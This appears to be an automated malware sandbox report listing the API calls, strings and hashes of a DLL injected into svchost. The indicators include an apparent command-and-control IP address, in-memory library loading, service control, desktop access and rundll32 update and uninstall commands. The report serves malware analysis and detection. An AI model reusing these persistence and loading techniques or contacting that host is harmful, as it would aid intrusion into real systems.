• API ID: memset$Filestrlenstrrchrwsprintf$CloseCreateHandleWritelstrcpymemcpystrncpy
• String ID: %s %s
• API String ID: 3641787489-2939940506
• Opcode ID: 5a089fb692a77de50dca985f2a1d46a33a195534b01f1893c6a9a2dd3832bb26
• Instruction ID: 17f6a9bfa48d753ffad60fceaecdc7a51846e01dcf90a102910361a13764abaa
• Opcode Fuzzy Hash: 5a089fb692a77de50dca985f2a1d46a33a195534b01f1893c6a9a2dd3832bb26
• Instruction Fuzzy Hash: B5318972A001196FFB60DBA4CC89FDB73ACDB05395F104562F608E2085EF71AE44CB61
APIs
• strlen.MSVCRT ref: 10002C9F
• ??2@YAPAXI@Z.MSVCRT(00000001), ref: 10002CB3
• memcpy.MSVCRT(00000000,?,00000001,00000001), ref: 10002CBF
• strrchr.MSVCRT ref: 10002CC7
• ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10002D27
  • Part of subcall function 10004529: LoadLibraryA.KERNEL32(wininet.dll,?,00000001,00000000), ref: 1000454D
  • Part of subcall function 10004529: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10004564
  • Part of subcall function 10004529: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 1000457E
  • Part of subcall function 10004529: FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 1000459C
  • Part of subcall function 1000248B: GetFileAttributesA.KERNEL32(00000001,10002CE8,00000001), ref: 1000248F
  • Part of subcall function 1000248B: GetLastError.KERNEL32 ref: 1000249A
• CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002D18
Strings
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: AddressLibraryProc$??2@??3@AttributesCreateErrorFileFreeLastLoadProcessmemcpystrlenstrrchr
• String ID: D$WinSta0\Default
• API String ID: 1737965409-1101385590
• Opcode ID: fdc65b0dcff99aff6c43371ba455fda07db6a1f497c56a226c9a0abe83cfdb15
• Instruction ID: 4c329e371b8b631c085a2e87808acd0a5feba54148e937fde04f6f1ec7f3be4b
• Opcode Fuzzy Hash: fdc65b0dcff99aff6c43371ba455fda07db6a1f497c56a226c9a0abe83cfdb15
• Instruction Fuzzy Hash: 6F01E1B75012286AFB01DBE49C45EDF77ACDF093D5F114422FE05E604ADEB49D0582E4
APIs
• LoadLibraryA.KERNEL32(user32.dll,?,?,00000000,?,00000000,Function_00004CE2,10005170,000000FF,?,100042CA,00000000), ref: 1000448F
• GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 100044A4
• GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 100044B0
• GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 100044BC
Strings
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
• API String ID: 2238633743-3711086354
• Opcode ID: c36e72de9a328b3aed83568275539afdfd72128828bb5f39de00532976b64ac8
• Instruction ID: 34d8331da3f18528c44290a267cf2e76cab1e846e39b69c6303802ebf673ca42
• Opcode Fuzzy Hash: c36e72de9a328b3aed83568275539afdfd72128828bb5f39de00532976b64ac8
• Instruction Fuzzy Hash: A3116DB5D00229ABEB11DFA9CC44FDDBAF8FB0C790F214125F511F2254CB7158008BA4
APIs
• printf.MSVCRT ref: 1000240A
  • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038D8
  • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038E8
  • Part of subcall function 1000389D: GetProcessHeap.KERNEL32(00000000,00000014,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C), ref: 100038F9
  • Part of subcall function 1000389D: HeapAlloc.KERNEL32(00000000,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C,?), ref: 10003900
  • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003924
  • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003933
  • Part of subcall function 1000389D: memcpy.MSVCRT(00000000,?,?,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?), ref: 10003944
• OutputDebugStringA.KERNEL32(Can't load library from memory.,?,?,1000234E,?,10006E5C,?,00000000,00000000,?,?), ref: 10002421
• printf.MSVCRT ref: 1000244D
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10002462
Strings
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: AllocVirtual$Heapprintf$DebugFreeOutputProcessStringmemcpy
• String ID: Can't load library from memory.$LoadFromMemory $LoadFromMemory END---$PluginMe
• API String ID: 2530445704-2282109540
• Opcode ID: f0778e8a1c44c2343f6cf091ec4a36fe4ce25287fc1b95e6eb17d6c0cbbf42cd
• Instruction ID: 01af0e0ac1652a7321e0a293c3daa08a0af86dfdeaa3eab1b942b575fdefc638
• Opcode Fuzzy Hash: f0778e8a1c44c2343f6cf091ec4a36fe4ce25287fc1b95e6eb17d6c0cbbf42cd
• Instruction Fuzzy Hash: C3F09636100114BBFF02AF90DC05FDE3B75EB897E2F348015FA0455069CF72581597A1
APIs
• GetModuleFileNameA.KERNEL32(?,00000104), ref: 100020E5
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100020F3
• GetTickCount.KERNEL32 ref: 100020F9
• wsprintfA.USER32 ref: 10002113
• MoveFileA.KERNEL32(?,?), ref: 1000212A
• MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000213B
Strings
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
• String ID: %s\%d.bak
• API String ID: 830686190-2116986511
• Opcode ID: c8f7a2f9335d496cf424573f89800cf957bdb9276c51bc95e16fdfb109c3bf7e
• Instruction ID: c4293e3e21d6716b8372ba05ce181a3280e6ef40116a7aaffd0535516b57a778
• Opcode Fuzzy Hash: c8f7a2f9335d496cf424573f89800cf957bdb9276c51bc95e16fdfb109c3bf7e
• Instruction Fuzzy Hash: BEF0A4BA800278ABEB10EB94CDCDECB777DEB18785F100191F755D2065DAB59684CFA0
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00000144,00000000,?,?,100037E0), ref: 10003676
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1000368E
• GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 10003698
• FreeLibrary.KERNEL32(00000000), ref: 100036AC
Strings
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: AddressLibraryProc$FreeLoad
• String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
• API String ID: 2256533930-2522683910
• Opcode ID: 34a6eaa16ec599896768d47b9751df638f2169115c1a8e10c5d2607526b1ef77
• Instruction ID: ef67112214a51d6d1f3e9f06108ff16868adfdb602b3d8d3b658392e0a076cbe
• Opcode Fuzzy Hash: 34a6eaa16ec599896768d47b9751df638f2169115c1a8e10c5d2607526b1ef77
• Instruction Fuzzy Hash: CBF0A072A00314BBF701D7E58C98DAF7BBCDB886D1B104019FA00A3208DB739D0189B5
APIs
• Sleep.KERNEL32(00000064), ref: 10002279
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10002323
• memcpy.MSVCRT(00000000,?,?), ref: 10002336
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10002371
• memcpy.MSVCRT(00000000,?,?), ref: 10002384
Strings
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: AllocVirtualmemcpy$Sleep
• String ID: GW2$SGSWh5-$SPh\n
• API String ID: 1263862976-685354651
• Opcode ID: 3d25bdad23a031e0b48f737afd54ec3eb76eea0dcd6b60b485997711385254f5
• Instruction ID: 2f54f0f1129bbba38d4c41c0db51b56afb961a9339435d6967ffbe2678c67ccd
• Opcode Fuzzy Hash: 3d25bdad23a031e0b48f737afd54ec3eb76eea0dcd6b60b485997711385254f5
• Instruction Fuzzy Hash: E241F3B5104244BEF720DFA18CC6F7F7A6CEB457C4F10842AFA894548DCB76AE40A622
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
• OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
• QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
• ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
• Sleep.KERNEL32(0000000A), ref: 10001B2F
• QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
• CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
• CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
• String ID:
• API String ID: 2359367111-0
• Opcode ID: 5fba824a85b92acc79a789ef028bf042a0167ae6a51034b94a07b5d3b0519e81
• Instruction ID: 13eb0d6c039a265936ccbdc891ea19e15248044979c42994c6487f454c48f15c
• Opcode Fuzzy Hash: 5fba824a85b92acc79a789ef028bf042a0167ae6a51034b94a07b5d3b0519e81
• Instruction Fuzzy Hash: 87017531644627ABF7119BA09C89FFF7BBAEF0A7C1F204060FA01D509DEB648542D6A1
APIs
  • Part of subcall function 1000180A: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
  • Part of subcall function 1000180A: CancelIo.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001838
  • Part of subcall function 1000180A: InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
  • Part of subcall function 1000180A: closesocket.WS2_32(?), ref: 1000184D
  • Part of subcall function 1000180A: SetEvent.KERNEL32(?,?,10001455,00002081,00000000), ref: 10001856
• ResetEvent.KERNEL32(?,00002081,00000000,00000000), ref: 10001458
• socket.WS2_32(00000002,00000001,00000006), ref: 10001469
• gethostbyname.WS2_32(?), ref: 1000147A
• htons.WS2_32(?), ref: 1000148F
• connect.WS2_32(?,00000002,00000010), ref: 100014AC
• setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 100014D1
• WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 10001502
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
• String ID:
• API String ID: 4281462294-0
• Opcode ID: 3bd37e16282c1c1f21b19040e991c0c37f16a42726fa5d42d22308dc76884aca
• Instruction ID: 8d33707021d861f585806a6466cff3f66270e93c65c897c0ed9a4eea2b4cd3d2
• Opcode Fuzzy Hash: 3bd37e16282c1c1f21b19040e991c0c37f16a42726fa5d42d22308dc76884aca
• Instruction Fuzzy Hash: 9421BD71500719BFE7109FA4CC84EEBBBF9EF09394F104529F602A62A4C7B29D449B20
APIs
• __EH_prolog.LIBCMT ref: 100012D9
• _CxxThrowException.MSVCRT(?,10005258), ref: 10001332
• WSAStartup.WS2_32(00000202,?), ref: 10001343
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10001350
• memcpy.MSVCRT(?,00000068,00000003), ref: 10001379
Strings
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: CreateEventExceptionH_prologStartupThrowmemcpy
• String ID: hx
• API String ID: 80965288-1695387836
• Opcode ID: 77854b9b63fc0fb3e868ca2b5d078d50e29d64ea9dc30742ffd87570b9eaf05b
• Instruction ID: e29fc32a716e33b2e16fee5429824c3098a31f8f694cb1b228e84ed99c9fd0ff
• Opcode Fuzzy Hash: 77854b9b63fc0fb3e868ca2b5d078d50e29d64ea9dc30742ffd87570b9eaf05b
• Instruction Fuzzy Hash: 8211B4748013849EF710DBA8CD89BEEBBB8DF09384F50005DF141A7286DFB56A08CB62
APIs
Strings
• Rundll32 "%s",DllUpdate %s, xrefs: 10002774
• Rundll32 "%s",Uninstall, xrefs: 10002792
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: wsprintf$ExecFileModuleName
• String ID: Rundll32 "%s",DllUpdate %s$Rundll32 "%s",Uninstall
• API String ID: 4265364758-3622515909
• Opcode ID: 2fae55858e382da93d8a6581f30ac6264c287b13e5b54571d9062f30e9afb438
• Instruction ID: 96afaeef2140f7acea31c6041c278450ca2d3413692d0236748e955fccce9fd0
• Opcode Fuzzy Hash: 2fae55858e382da93d8a6581f30ac6264c287b13e5b54571d9062f30e9afb438
• Instruction Fuzzy Hash: 0FF01875400228AFFB10DB50CC8DFCA777DEB08384F604191F659D2065DBB19698CF91
APIs
• LocalAlloc.KERNEL32(00000040,00000229,?,100022D7,?), ref: 10002616
• memcpy.MSVCRT(00000001,119.91.152.151,00000228,?,100022D7,?), ref: 10002633
• LocalSize.KERNEL32(00000000), ref: 1000263C
  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
• Sleep.KERNEL32(00000001,00000000,00000000), ref: 1000264F
• LocalFree.KERNEL32(00000000), ref: 10002656
Strings
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: Localmemcpy$??2@??3@$AllocFreeSizeSleep
• String ID: 119.91.152.151
• API String ID: 3084024409-912133076
• Opcode ID: 2ebc1bcf665d22d67c7a361327471c09cc11f5b44399916a7679a62a2e06e5b5
• Instruction ID: 6c6233c5ed4335591c5831c53d58df47d942e828471bf6846fd26331ce1e1182
• Opcode Fuzzy Hash: 2ebc1bcf665d22d67c7a361327471c09cc11f5b44399916a7679a62a2e06e5b5
• Instruction Fuzzy Hash: 1BE092750036317BF341ABA09C4DFCF3A6DEF097D1F044104FB49A5199CB51564187E6
APIs
  • Part of subcall function 100012A4: VirtualFree.KERNEL32(?,00000000,00008000,?,10001878,?,00000144,00000000,1000381E,000000C8,00000144), ref: 100012B6
• ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
• ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
• ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
• memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
• ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
• memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
  • Part of subcall function 1000104C: memcpy.MSVCRT(?,00000003,00000003,00000000,?,?,10001947,?,00000003,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001074
Memory Dump Source
• Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
Similarity
• API ID: memcpy$??2@??3@$FreeVirtual
• String ID:
• API String ID: 494799333-0
• Opcode ID: 4ee7b13994a7bebae5ea71dd6d5e065c25e5d167394b36d5181ca15b21c419c8
• Instruction ID: a26a835bd5f016d956b68753e1f5501337bc07bd69db5d8cf19c0b84b9b19e4d
• Opcode Fuzzy Hash: 4ee7b13994a7bebae5ea71dd6d5e065c25e5d167394b36d5181ca15b21c419c8
• Instruction Fuzzy Hash: B631CBB9601204BBFF01EB64DD92FEE77AAEF44380F004019F605A6186DFB4BB149751
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strupr$MessageSendVisibleWindowlstrlenstrstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 850376632-0
                                                                                                                • Opcode ID: 863bd39a3c954a72feaba740ccb092445ef11d91041d151f256abd7524e25783
                                                                                                                • Instruction ID: f84e90a798d893893a4456b5c45592e19e504f04fdea282cdc153707e49d09ee
                                                                                                                • Opcode Fuzzy Hash: 863bd39a3c954a72feaba740ccb092445ef11d91041d151f256abd7524e25783
                                                                                                                • Instruction Fuzzy Hash: 3001B9726002296FFF109F64DC49F9A7BBCEB04385F204076E705E6094DB71E9468BA4
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeLibrary
                                                                                                                • String ID:
                                                                                                                • API String ID: 3664257935-0
                                                                                                                • Opcode ID: f0b267456437bb5650b3bd9d655f830ec4ec3bf790c62446a31930fdfe0cb4b5
                                                                                                                • Instruction ID: d8b8667a67b2f2557cad44f9379b5e8f255c0c6237c58758e20748922239760e
                                                                                                                • Opcode Fuzzy Hash: f0b267456437bb5650b3bd9d655f830ec4ec3bf790c62446a31930fdfe0cb4b5
                                                                                                                • Instruction Fuzzy Hash: A6F0EC706007459AEA61EE7ACC44B17F3ECEF90AD1B028929A451D3694DA74EC458960
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: strlenwsprintf
                                                                                                                • String ID: Group$Remark$SYSTEM\CurrentControlSet\Services\%s$SySyeu
                                                                                                                • API String ID: 350797232-2818619236
                                                                                                                • Opcode ID: b298f06eb582685539f31f60401fdbef796c9698157982a35a7a39406c1ee736
                                                                                                                • Instruction ID: a3fc7b85e27bf4a01dcc346c82e5e7340bd10ea751e75b0120d021e994437014
                                                                                                                • Opcode Fuzzy Hash: b298f06eb582685539f31f60401fdbef796c9698157982a35a7a39406c1ee736
                                                                                                                • Instruction Fuzzy Hash: CCF065B6800124B7FF10AB54DC4AFDA3B6DDB083D4F1040E1FE0966158EBB55A94CBD1
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038D8
                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038E8
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000014,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C), ref: 100038F9
                                                                                                                • HeapAlloc.KERNEL32(00000000,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C,?), ref: 10003900
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003924
                                                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003933
                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?), ref: 10003944
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
